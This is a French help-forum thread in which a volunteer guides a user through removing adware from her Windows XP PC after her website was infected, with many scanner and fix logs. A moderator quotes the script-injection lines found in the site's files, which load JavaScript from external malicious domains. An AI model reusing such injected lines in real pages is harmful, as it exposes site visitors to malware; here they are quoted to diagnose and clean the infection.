Mon site web était infecté...... et mon pc ?

GWEN -  
jacques.gache Messages postés 34829 Statut Contributeur sécurité -
Bonjour,
Après avoir désinfecté mon site web, je voudrais votre aide pour nettoyer totalement mon Pc qui est peut-être la source de l'infection de mon site web.

Après avoir respecté la procédure sur "https://www.commentcamarche.net/faq/2490-supprimer-les-adwares-publicites-intempestives-pop-up-etc", voici les 3 rapports qui semblerait nécessaire à celui qui veut bien m'aider:
___________________________________________________________
Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Version de la base de données: 4564

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

07/09/2010 21:43:32
mbam-log-2010-09-07 (21-43-32).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 157192
Temps écoulé: 9 minute(s), 4 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 1
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 1
Elément(s) de données du Registre infecté(s): 1
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 4

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Delete on reboot.

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Quarantined and deleted successfully.

Elément(s) de données du Registre infecté(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw_navps.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw_nav.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Quarantined and deleted successfully.

________________________________________________________________

KASPERSKY ONLINE SCANNER 7.0: scan report
Wednesday, September 8, 2010
Operating system: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Last database update: Tuesday, September 07, 2010 12:39:03
Records in database: 4202275
--------------------------------------------------------------------------------

Scan settings:
scan using the following database: extended
Scan archives: yes
Scan e-mail databases: yes

Scan area - My Computer:
C:\
D:\
E:\
Z:\

Scan statistics:
Objects scanned: 354878
Threats found: 1
Infected objects found: 2
Suspicious objects found: 0
Scan duration: 06:33:47

File name / Threat / Threats count
E:\System Volume Information\_restore{A086F1CC-3FBD-428D-8782-BF07C029DA93}\RP57\A0021928.exe Infected: Exploit.Win32.Umex.f 1
E:\System Volume Information\_restore{FE2C3B64-925A-4071-BAF4-26DA6A043BFC}\RP9\A0003740.exe Infected: Exploit.Win32.Umex.f 1

Selected area has been scanned.
_________________________________________________________________

Pour ZHP Diag: http://www.cijoint.fr/cjlink.php?file=cj201009/cijMHQ8CN8.txt
_________________________________________________________________



Voilà......j'espère que rien ne manque et qu'une personne généreuse me fera un petit signe!

Merci encore

13 réponses

Résumé de la discussion

Le problème porte sur un PC potentiellement infecté, soupçonné d’être à l’origine de l’infection d’un site web après désinfection, nécessitant un nettoyage complet. Des outils ont détecté des composants indésirables tels que Adware.WidgiToolbar et Adware.Navipromo.H; Kaspersky a trouvé deux objets infectés dans les restaurations; ZHPDiag révèle des scripts BBC.js dans EasyPHP. Pour approfondir le nettoyage, mettre à jour Malwarebytes, relancer un scan complet et refaire ZHPDiag après suppression afin de partager le nouveau rapport pour contrôle. En complément, certaines infections peuvent persister dans les sauvegardes système ou les extensions des navigateurs; une vérification ciblée des modules complémentaires est utile pour sécuriser le poste.

Généré automatiquement par IA
sur la base des meilleures réponses
  1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
     
    bonjour, ton rapport de zhpdiag à été fais avant le nettoyage de malwarebytes

    zhpdiag = Run by Gwen at 07/09/2010 21:04:32
    malwarebytes = 07/09/2010 21:43:32
    et comme il a fais du nettoyage il serait bien d'en poster un nouveau zhpdiag pour contrôle
    deplus ton malwarebytes ne mez semble pas à jour car chez moi j'ai la version 4573 et toi la 4564 ??

    donc si tu peux faire cela , merci

    Double cliques sur le raccourci ZHPDiag sur ton Bureau pour XP

    Clique sur le Tournevis puis sur Tous pour cocher toutes les cases des options.

    Cliques sur la loupe pour lancer l'analyse.

    Laisses l'outil travailler, il peut être assez long.

    A la fin de l'analyse,clique sur l'appareil photo et enregistre le rapport sur ton Bureau.

    Fermes ZHPDiag en fin d'analyse.

    Pour me le transmettre clique sur ce lien :

    http://www.cijoint.fr/index.php

    Clique sur Parcourir et cherche le fichier C:\Documents and settings\le_nom_de_ta_session\bureau\.ZHPDiag.txt

    ou directement en choisissant bureau et ZHPDiag.txt clique dessus

    Clique sur Ouvrir.

    Clique sur "Cliquez ici pour déposer le fichier".

    Un lien de cette forme :

    http://www.cijoint.fr/cjlink.php?file=cj200905/cib7SU.txt

    est ajouté dans la page.

    Copie ce lien dans ta réponse.
    1
  2. GWEN
     
    Bonsoir Jacques.

    Merci pour ta prompte réponse!!! :-)

    J'upgrage Malwarebyte, je le fais tourner et j'enregistre le rap. à la fin, puis je m'occupe de ZHPDiag. Je m'y attelle et je t'envoie le tout.

    Merci!
    1
  3. GWEN
     
    Salut Jacques, voici enfin les rapports:

    ZHPDiag: http://www.cijoint.fr/cjlink.php?file=cj201009/cijCb0Iy2u.txt

    Malwarebyte version 4573: http://www.cijoint.fr/cjlink.php?file=cj201009/cijpQzfSkC.txt
    1
    1. GWEN
       
      Il est un peu tard.... Merci encore et à demain !
      0
    2. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, tu fais ce qui suit , Merci

      1) fixes les lignes donnés avec zhpfix

      . Copie les lignes suivante en GRAS


      [MD5.293E66AA529F0FBA1AA56340E293A389] - (.Spigot, Inc. - Application Updater.) -- C:\Program Files\Application Updater\ApplicationUpdater.exe [380928]
      M1 - SPR:Search Page Redirection - C:\Program Files\Mozilla FireFox\extensions\pdfforge@mybrowserbar.com
      M1 - SPR:Search Page Redirection - C:\Program Files\Mozilla FireFox\extensions\searchsettings@spigot.com
      R3 - URLSearchHook: Microsoft Url Search Hook - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) (1, 2, 3, 16) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll
      O2 - BHO: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll
      O2 - BHO: (no name) - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll
      O3 - Toolbar: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll
      O4 - HKLM\..\Run: [SearchSettings] . (.Spigot, Inc. - Search Settings application.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.exe
      O23 - Service: Application Updater (Application Updater) . (.Spigot, Inc. - Application Updater.) - C:\Program Files\Application Updater\ApplicationUpdater.exe
      O42 - Logiciel: pdfforge Toolbar v1.1.2 - (.Spigot, Inc..) [HKLM] -- {5791B7D3-8B34-4218-9750-6A8E45D0AD32}
      [HKCU\Software\LanConfig]
      [HKCU\Software\Search Settings]
      [HKCU\Software\pdfforge]
      [HKLM\Software\Application Updater]
      [HKLM\Software\Search Settings]
      [HKLM\Software\pdfforge]
      O43 - CFD:Common File Directory ----D- C:\Program Files\Application Updater
      O43 - CFD:Common File Directory ----D- C:\Program Files\pdfforge Toolbar
      O61 - LFC:Last File Created 06/09/2010 - 07:55:33 ---A- C:\Documents And Settings\Gwen\Application Data\Search Settings\kb130\temp\ws-14858.log [0]
      O61 - LFC:Last File Created 08/09/2010 - 20:03:43 ---A- C:\Documents And Settings\Gwen\Application Data\Search Settings\kb130\temp\ws-14860.log [796]
      O64 - Services: CurCS - C:\Program Files\Application Updater\ApplicationUpdater.exe - Application Updater (Application Updater) .(.Spigot, Inc. - Application Updater.) - LEGACY_APPLICATION_UPDATER
      SR - | Auto 08/01/2010 380928 | Application Updater (Application Updater) . (.Spigot, Inc..) - C:\Program Files\Application Updater\ApplicationUpdater.exe




      . Lance ZHPFix de Nicolas Coolman qui se trouve sur ton bureau
      . Pour XP, double-clique sur ZHPFix
      . pour Vista et seven, faire un clic droit sur l'icône et exécute en tant qu'administrateur.
      . Clique sur l'icone représentant la lettre H (« coller les lignes Helper »)

      Dans l'encadré principal tu verras donc les lignes que tu as copié précédemment apparaitrent .

      Vérifie que toutes les lignes que je t'ai demandé de copier (et seulement elles) sont dans la fenêtre.

      . cliques sur OK
      . Clique sur « Tous », puis sur « Nettoyer »
      . Copie/colle la totalité du rapport dans ta prochaine réponse
      tu le trouveras dans le dossier de zhpdiag dans program files sous le nom de ZHPFixReport


      2) passes ad-remover en nettoyage


      Déactives ton anti-virus et anti-spyware le temps du scan

      Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool.
      Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
      Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.


      Télécharge Ad-Remover sur ton bureau:
      http://pagesperso-orange.fr/NosTools/C_XX/AD-R.exe
      ou:
      https://www.androidworld.fr/

      /!\ Ferme toutes tes applications ouvertes. /!\

      Double clique sur le fichier que tu viens de télécharger, à l'écran qui apparait, clique sur "Nettoyer".
      Laisse travailler l'outil.
      Poste le rapport qui s'affiche à l'écran quand l'analyse est terminée.



      ( Le rapport est sauvegardé sous C:\Ad-report-clean.log )
      0
  4. GWEN
     
    SALUT JACQUES? PARDON POUR LE RETARD!

    (je re-poste car je ne suis pas sûre que ce soit passé!!!

    ZHPFixReport:

    Rapport de ZHPFix v1.12.3147 par Nicolas Coolman, Update du 07/09/2010
    Fichier d'export Registre :
    Run by Gwen at 09/09/2010 20:15:10
    Web site : http://www.premiumorange.com/zeb-help-process/zhpfix.html
    Contact : nicolascoolman@yahoo.fr

    ========== Processus mémoire ==========
    C:\Program Files\Application Updater\ApplicationUpdater.exe [380928] => Supprimé et mis en quarantaine

    ========== Clé(s) du Registre ==========
    O2 - BHO: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll => Clé absente
    O2 - BHO: (no name) - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll => Clé absente
    O23 - Service: Application Updater (Application Updater) . (.Spigot, Inc. - Application Updater.) - C:\Program Files\Application Updater\ApplicationUpdater.exe => Clé absente
    HKCU\Software\LanConfig => Clé supprimée avec succès
    HKCU\Software\Search Settings => Clé absente
    HKCU\Software\pdfforge => Clé absente
    HKLM\Software\Application Updater => Clé absente
    HKLM\Software\Search Settings => Clé absente
    HKLM\Software\pdfforge => Clé absente
    O64 - Services: CurCS - C:\Program Files\Application Updater\ApplicationUpdater.exe - Application Updater (Application Updater) .(.Spigot, Inc. - Application Updater.) - LEGACY_APPLICATION_UPDATER => Clé absente

    ========== Valeur(s) du Registre ==========
    R3 - URLSearchHook: Microsoft Url Search Hook - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) (1, 2, 3, 16) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll => Valeur absente
    O3 - Toolbar: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll => Valeur absente
    O4 - HKLM\..\Run: [SearchSettings] . (.Spigot, Inc. - Search Settings application.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.exe => Valeur absente

    ========== Dossier(s) ==========
    C:\Program Files\Application Updater => Dossier absent
    C:\Program Files\pdfforge Toolbar => Dossier absent

    ========== Fichier(s) ==========
    c:\program files\mozilla firefox\extensions\pdfforge@mybrowserbar.com => Supprimé et mis en quarantaine
    c:\program files\mozilla firefox\extensions\searchsettings@spigot.com => Supprimé et mis en quarantaine
    c:\program files\pdfforge toolbar\searchsettings.dll => Supprimé et mis en quarantaine
    c:\program files\pdfforge toolbar\ie\1.1.2\pdfforgetoolbarie.dll => Supprimé et mis en quarantaine
    c:\program files\pdfforge toolbar\searchsettings.exe => Supprimé et mis en quarantaine
    c:\documents and settings\gwen\application data\search settings\kb130\temp\ws-14858.log => Supprimé et mis en quarantaine
    c:\documents and settings\gwen\application data\search settings\kb130\temp\ws-14860.log => Supprimé et mis en quarantaine

    ========== Logiciel(s) ==========
    O42 - Logiciel: pdfforge Toolbar v1.1.2 - (.Spigot, Inc..) [HKLM] -- {5791B7D3-8B34-4218-9750-6A8E45D0AD32} => Logiciel supprimé avec succès

    ========== Récapitulatif ==========
    1 : Processus mémoire
    10 : Clé(s) du Registre
    3 : Valeur(s) du Registre
    2 : Dossier(s)
    7 : Fichier(s)
    1 : Logiciel(s)

    End of the scan

    ____________________________________________________________________________________________
    __________________________________________________________________________________________

    ======= RAPPORT D'AD-REMOVER 2.0.0.1,E | UNIQUEMENT XP/VISTA/7 =======

    Mis à jour par C_XX le 06/09/10 à 15:20
    Contact: AdRemover.contact[AT]gmail.com
    Site web: http://www.teamxscript.org

    C:\Program Files\Ad-Remover\main.exe (SCAN [1]) -> Lancé à 21:06:30 le 09/09/2010, Mode normal

    Microsoft Windows XP Édition familiale Service Pack 3 (X86)
    Gwen@GWEN2 ( )

    ============== RECHERCHE ==============

    0,Dossier trouvé: C:\Program Files\Mozilla FireFox\extensions\pdfforge@mybrowserbar.com
    0,Dossier trouvé: C:\Program Files\Mozilla Firefox\extensions\searchsettings@spigot.com
    0,Dossier trouvé: C:\Documents and Settings\SURF INTERNET\Application Data\pdfforge
    0,Dossier trouvé: C:\Documents and Settings\SURF INTERNET\Application Data\Search Settings

    ============== SCAN ADDITIONNEL ==============

    ** Mozilla Firefox Version [3.6.8 (fr)] **

    -- C:\Documents and Settings\Gwen\Application Data\Mozilla\FireFox\Profiles\yrwvo8wm.default\Prefs.js --
    browser.download.dir, Z:\\FROM WEB
    browser.startup.homepage, hxxp://www.sfr.fr
    browser.startup.homepage_override.mstone, rv:1.9.2.8

    -- C:\Documents and Settings\SURF INTERNET\Application Data\Mozilla\FireFox\Profiles\4vkas4y2.default\Prefs.js --
    browser.download.dir, Z:\\FROM WEB
    browser.startup.homepage, hxxp://www.sfr.fr
    browser.startup.homepage_override.mstone, rv:1.9.2.8

    ========================================

    ** Internet Explorer Version [8.0.6001.18702] **

    [HKCU\Software\Microsoft\Internet Explorer\Main]
    Default_Page_URL: hxxp://partnerpage.google.com/smallbiz.dell.com/fr_fr?hl=fr&client=dell-row&channel=fr-smb&ibd=4080126
    Do404Search: 0x01000000
    Enable Browser Extensions: yes
    Local Page: C:\WINDOWS\system32\blank.htm
    Search bar: hxxp://www.google.com/hws/sb/dell-row/fr/side.html?channel=fr-smb
    Search Page: hxxp://www.google.com/hws/sb/dell-row/fr/side.html?channel=fr-smb
    Show_ToolBar: yes
    Start Page: hxxp://www.club-internet.fr
    Use Search Asst: no

    [HKLM\Software\Microsoft\Internet Explorer\Main]
    Default_Page_URL: hxxp://go.microsoft.com/fwlink/?LinkId=69157
    Default_Search_URL: hxxp://go.microsoft.com/fwlink/?LinkId=54896
    Delete_Temp_Files_On_Exit: yes
    Local Page: C:\WINDOWS\system32\blank.htm
    Search Page: hxxp://go.microsoft.com/fwlink/?LinkId=54896
    Start Page: hxxp://go.microsoft.com/fwlink/?LinkId=69157

    [HKLM\Software\Microsoft\Internet Explorer\ABOUTURLS]
    Tabs: res://ieframe.dll/tabswelcome.htm
    Blank: res://mshtml.dll/blank.htm

    ========================================

    C:\Program Files\Ad-Remover\Quarantine: 0 Fichier(s)
    C:\Program Files\Ad-Remover\Backup: 1 Fichier(s)

    C:\Ad-Report-SCAN[1].txt - 09/09/2010 (776 Octet(s))

    Fin à: 21:10:32, 09/09/2010

    ============== E.O.F ==============
    1
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      ok tu vas faire un fixmbr avec zhpfix , et puis après un redémarrage me poster un nouveau zhpdiag pour contrôle , merci

      . Copie la ligne suivante en GRAS


      MBRFix



      . Lance ZHPFix de Nicolas Coolman qui se trouve sur ton bureau
      . Pour XP, double-clique sur ZHPFix
      . pour Vista et seven, faire un clic droit sur l'icône et exécute en tant qu'administrateur.
      . Clique sur l'icone représentant la lettre H (« coller les lignes Helper »)

      Dans l'encadré principal tu verras donc les lignes que tu as copié précédemment apparaitrent .

      Vérifie que toutes les lignes que je t'ai demandé de copier (et seulement elles) sont dans la fenêtre.

      . cliques sur OK
      . Clique sur « Tous », puis sur « Nettoyer »
      . Copie/colle la totalité du rapport dans ta prochaine réponse
      tu le trouveras dans le dossier de zhpdiag dans program files sous le nom de ZHPFixReport
      0
    2. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      alors Gwen, pas eu le temps de t'inscrire sur CCM ... ça vaut un bon virus ça ...
      @jacques.gache : merci pour ton suivi
      @+
      bg
      0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. GWEN
     
    Bonsoir Jacques, voici le rapport MBR Fix:

    apport de ZHPFix v1.12.3147 par Nicolas Coolman, Update du 07/09/2010
    Fichier d'export Registre :
    Run by Gwen at 10/09/2010 18:36:58
    Web site : http://www.premiumorange.com/zeb-help-process/zhpfix.html
    Contact : nicolascoolman@yahoo.fr

    ========== Master Boot Record ==========
    Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net

    device: opened successfully
    user: MBR read successfully
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
    kernel: MBR read successfully
    user & kernel MBR OK

    Resultat après le fix :
    Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net

    device: opened successfully
    user: MBR read successfully
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
    kernel: MBR read successfully
    user & kernel MBR OK

    ========== Récapitulatif ==========
    1 :Master Boot Record

    End of the scan

    J'espère que tout est bien!

    Merci encore!
    1
    1. GWEN
       
      POUR bg 62

      Je me suis inscrit le lendemain. En fait, fallait repasser par la première page de CCM mais je ne l'avais pas vu.... :-(

      @ plus
      0
    2. GWEN
       
      Autres questions.....: que faut-il rajouter à Bitdefender, Spybot + Ad Aware pour avoir la meilleur protection possible?

      Merrrrrrrrrrrci beaucoup!
      0
    3. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      laisse faire ton helpeur, il va t'amener au bout :-)
      0
  7. GWEN
     
    Bien sûr ... je ne ferai rien sans lui. C'est vraiment sympa de leur part et de sa part de s'occuper de nous! J'en reviens toujours pas!
    1
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, peux tu poster un nouveau zhpdiag , merci

      Double cliques sur le raccourci ZHPDiag sur ton Bureau pour XP sinon clique droit et en tant que administrateur !!

      Clique sur le Tournevis puis sur Tous pour cocher toutes les cases des options.

      Cliques sur la loupe pour lancer l'analyse.

      Laisses l'outil travailler, il peut être assez long.

      A la fin de l'analyse,clique sur l'appareil photo et enregistre le rapport sur ton Bureau.


      Fermes ZHPDiag en fin d'analyse.


      Pour me le transmettre clique sur ce lien :

      http://www.cijoint.fr/index.php

      Clique sur Parcourir et cherche le fichier C:\Documents and settings\le_nom_de_ta_session\bureau\.ZHPDiag.txt

      ou directement en choisissant bureau et ZHPDiag.txt clique dessus

      Clique sur Ouvrir.

      Clique sur "Cliquez ici pour déposer le fichier".

      Un lien de cette forme :

      http://www.cijoint.fr/cjlink.php?file=cj200905/cib7SU.txt

      est ajouté dans la page.

      Copie ce lien dans ta réponse.
      0
  8. GWEN
     
    Bonjour Jacques,

    Voici le fichier demandé:

    http://www.cijoint.fr/cjlink.php?file=cj201009/cijAmwmpZM.txt

    Merci.
    1
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, au vu du dernier rapport je dirais que c'est bon pour moi , mais tu vas passer list&kill"em, je pense qu'il va finir le nettoyage !! tu me dira comment tu sens topn pc et si plus de problèmes pour toi on finalisera cela !!


      A) passes lis&kill"em option Search



      DESACTIVE TON ANTIVIRUS ET TON PAREFEU SI PRESENTS !!!!!(car il est detecté a tort comme infection)

      Télécharge List_Kill'em et enregistre le sur ton bureau

      double clique ( clic droit "executer en tant qu'administrateur" pour Vista/7 ) sur le raccourci sur ton bureau pour lancer l'installation

      une fois terminée , clic sur "terminer" et le programme se lancera seul

      choisis l'option Search

      un icone blanc et noir va s'afficher sur le bureau , il te servira à relancer le programme par la suite.
      un autre rouge et noir te servira a desinstaller le prog a la fin de la desinfection.

      laisse travailler l'outil

      à l'apparition de la fenetre blanche , c'est un peu long , c'est normal , le programme n'est pas bloqué.

      un rapport du nom de catchme apparait sur ton bureau , ignore-le,ne le poste pas , , il s'auto supprimera a la fin du scan

      Poste le contenu du rapport qui s'ouvre aux 100 % du scan à l'ecran "COMPLETED"





      B) list&kill"em option Clean



      Relance List_Kill'em(soit en clic droit pour vista/7),avec le raccourci sur ton bureau.
      mais cette fois-ci :

      choisis l'Option Clean

      ton PC va redemarrer,

      laisse travailler l'outil.

      en fin de scan la fenetre se ferme , et tu as un rapport du nom de Kill'em.txt sur ton bureau ,

      colle le contenu dans ta reponse
      0
    2. GWEN
       
      Bonjour,

      Voici les liens pour les rapports de kill"em

      http://www.cijoint.fr/cjlink.php?file=cj201009/cij361DonF.txt
      et
      http://www.cijoint.fr/cjlink.php?file=cj201009/cijAiODaep.txt

      Si tout est bon, il faut que je désinfecte aussi mon site que j'ai rapatrié sur une clé USB.
      Dois-je lancer un nouveau sujet?

      Bien à toi et chapeau pour ton professionnalisme et la clarté de ton tutoriel!
      0
    3. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, si plus de problème sur le pc supprimes les outils utiliser avec zhpfix, fais un nettoyage avec ccleaner , pour ton site on vois après avoir fini sur le pc !!

      1) supprimes les outils utilisé

      Pour Xp : Double-cliquez sur l'icône ZHPFix.exe sur votre Bureau.

      Cliquez sur le A rouge (Nettoyeur de Tools).

      Cliquez sur Nettoyer.

      Faîtes redémarrer l'ordinateur pour terminer le nettoyage.

      si zhpfix plus sur ton pc télécharges le:

      https://www.zebulon.fr/telechargements/securite/systeme/zhpfix.html

      https://www.zebulon.fr/telechargements/securite/systeme/zhpfix.html


      2) fais un nettoyage avec ccleaner avec les réglages donnés


      télécharges Ccleaner à partir de cette adresses

      https://www.commentcamarche.net/telecharger/utilitaires/5647-ccleaner/


      .enregistres le sur le bureau
      .double-cliques sur le fichier pour lancer l'installation
      .sur la fenêtre de l'installation langage bien choisir français et OK
      .cliques sur suivant
      .lis la licence et j'accepte
      .cliques sur suivant
      .la tu ne gardes de coché que mettre un raccourci sur le bureau et puis contrôler automatiquement les mises à jour de Ccleaner
      .cliques sur intaller
      .cliques sur fermer
      .double-cliques sur l'icône de Ccleaner pour l'ouvrir
      .une fois ouvert tu cliques sur option et puis avancé
      .tu décoches effacer uniquement les fichiers, du dossier temp de windows plus vieux que 24 heures
      .cliques sur nettoyeur
      .cliques sur windows et dans la colonne avancé
      .cochesla première case vieilles données du perfetch que celle-la
      .cliques sur analyse une fois l'analyse terminé
      .cliques sur lancer le nettoyage et sur la demande de confirmation OK il vas falloir que tu le refasses une autre fois une fois fini vériffis en appuiant de nouveau sur analyse pour être sur qu'il n'y est plus rien
      .cliques maintenant sur registre et puis sur rechercher les erreurs
      .laisses tout cochées et cliques sur réparrer les erreurs sélectionnées
      .il te demande de sauvegarder OUI
      .tu lui donnes un nom pour pouvoir la retrouver et enregistre
      .cliques sur corriger toutes les erreurs sélectionnées et sur la demande de confirmation OK
      .il supprime et fermer tu vériffis en relancant rechercher les erreurs
      .tu retournes dans option et tu recoches la case effacer uniquement les fichiers, du dossier temp de windows plus vieux que 24 heures et sur nettoyeur, windows sous avancé tu décoches la première case vieilles données du perfetch
      .tu peux fermer Ccleaner

      pour aider si besion tutoriel: https://www.vulgarisation-informatique.com/nettoyer-windows-ccleaner.php




      et puis on vois pour ton site après
      0
    4. GWEN
       
      Ok, Jacques, tout est fait. Brillant la démonstration, la dextérité et le professionnalisme. Merci encore!
      0
    5. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      tu connect ta clé usb ou tu as mis ton site , tu ouvres malwarebytes qui normalement est toujour sur ton pc sinon télécharge le de nouveau

      . Double cliques sur malwarebytesz pour l'ouvrir
      . Dans l'onglet "mise à jour", cliques sur le bouton Recherche de mise à jour
      . si le pare-feu demande l'autorisation de se connecter pour malwarebytes, acceptes
      . Une fois la mise à jour terminée,
      rend-toi dans l'onglet, Recherche
      . Sélectionnes Exécuter un examen complet si il te demande de choisir les disque à analyser tu les sélectionnes tous surtout ta clé
      . Cliques sur Rechercher
      . Le scan démarre.
      . A la fin de l'analyse, un message s'affiche : L'examen s'est terminé normalement. Cliquez sur 'Afficher les résultats' pour afficher tous les objets trouvés.
      . Cliques sur Ok pour poursuivre.
      . Si des malwares ont été détectés, cliques sur Afficher les résultats
      . Sélectionnes tout (ou laisses cochés) et cliques sur Supprimer la sélection Malwarebytes va détruire les fichiers et clés de registre et en mettre une copie dans la quarantaine.
      . Malwarebytes va ouvrir le bloc-notes et y copier le rapport d'analyse.
      . redemarre le pc si il le fait pas lui même
      . une fois redémarré double-cliques sur malwarebytes
      . rends toi dans l'onglet rapport/log
      . tu cliques dessus pour l'afficher une fois affiché
      . tu cliques sur edition en haut du boc notes,et puis sur sélectionner tous
      . tu recliques sur edition et puis sur copier et tu reviens sur le forum et dans ta réponse
      . tu cliques droit dans le cadre de la reponse et coller
      0
  9. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
     
    @jacques.gache
    pour info, les infections détectées par google qui ont provoquées le blocage du site étaient :
    -- dans le fichier "bbc.js" un code est 'apparu' :
    
    document.write('<sc'+'ript type="text/javascript" src="http:
    //pocketbloke.ru/Telnet.js"></scri'+'pt>');
    
    
    -- dans une foule d'autre fichiers, ça a commencé à mettre des trucs genre ceci:
    
    <script type="text/javascript" src="http://nuttypiano.com/Te
    lnet.js">
    
    
    j'ai vérifié sur virustotal, bbc.js était noté infecté par nod32 ... 
    1
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bg62 bonjour, si tu as une idée et solution pour désinfecter le site je suis preneur , car sur un pc ok je me débrouille !! lol !! , mais un site c'est une première !! donc pas de problème si tu as la possibilité de faire mieux que moi et cela ne va pas être difficile tu prends le relais et moi j'apprend !!!!
      0
    2. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      re...
      au niveau 'désinfection', non suis pas du tout à la hauteur ... :-)
      là je n'ai fait que suivre les indications dans le compte 'google' et finir par trouver où ce(s) code(s) étaient venus s'installer pour pouvoir les supprimer manuellement ...
      d'où cela vient-il ? aucune idée (je t'ai mis les indications pour te donner une idée de la "bête", mais ...)
      et les outils de désinfection peuvent-ils les trouver, là grosse question ...
      alors : à toi tu seras certainement bien plus efficace !
      0
    3. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      re...
      au niveau 'désinfection', non suis pas du tout à la hauteur ... :-)
      là je n'ai fait que suivre les indications dans le compte 'google' et finir par trouver où ce(s) code(s) étaient venus s'installer pour pouvoir les supprimer manuellement ...
      d'où cela vient-il ? aucune idée (je t'ai mis les indications pour te donner une idée de la "bête", mais ...)
      et les outils de désinfection peuvent-ils les trouver, là grosse question ...
      alors : à toi tu seras certainement bien plus efficace !
      0
    4. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      GWEN bonjour, on va essayer de suivre la piste de bg62 tu va rechercher ce fichier bbc.js et puis on le fera analyser après

      Lien de téléchargement : http://pagesperso-orange.fr/NosTools/C_XX/SEAF.exe

      Miroir : https://www.androidworld.fr/


      Double-clique sur le fichier SEAF.exe

      et dans la fenêtre y Tapez le script demandé . bbc.js

      cocher la case chercher également dans le registre


      cliqué sur Lancer la recherche, un barre de progression va s'afficher. Cette recherche prend quelques minutes.



      Un rapport va s'ouvrir avec les résultats de la recherche.

      il faut Poster ce rapport par copier-coller en réponse dans le sujet

